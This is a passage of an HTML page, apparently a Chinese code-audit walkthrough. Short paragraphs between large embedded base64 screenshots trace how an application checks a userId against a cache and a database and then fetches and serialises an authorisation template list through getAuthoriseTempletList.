src="data:image/png;base64,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
|
|||
|
|
<p blockindex=16><strong>分析</strong>:绿框中的内容对userid的内容转换为小写,尝试从缓存(usermap)中获取用户信息,找到将结果返回</p>
|
|||
|
|
<p blockindex=17>蓝框中的内容就是去数据库中查找是否有该<code>userId</code>,若有则将结果返回</p>
|
|||
|
|
<p blockindex=18>分析完这个校验之后,接着进入到校验成功之后else语句中即如图代码中</p>
|
|||
|
|
<p blockindex=19><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=20><strong>分析</strong>:调用了<code>model.getAuthoriseTempletList</code>方法进行模板列表的更新,之后进行序列化并将结果返回给前端</p>
|
|||
|
|
<p blockindex=21><code>Ctrl</code>点击进入到<code>getAuthoriseTempletList</code>方法中</p>
|
|||
|
|
<p blockindex=22><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=23>它又调用了<code>List<AuthoriseTemplet></code>下的<code>getAuthoriseTempletList</code>方法,我们继续跟进</p>
|
|||
|
|
<p blockindex=24><img src="data:image/png;base64,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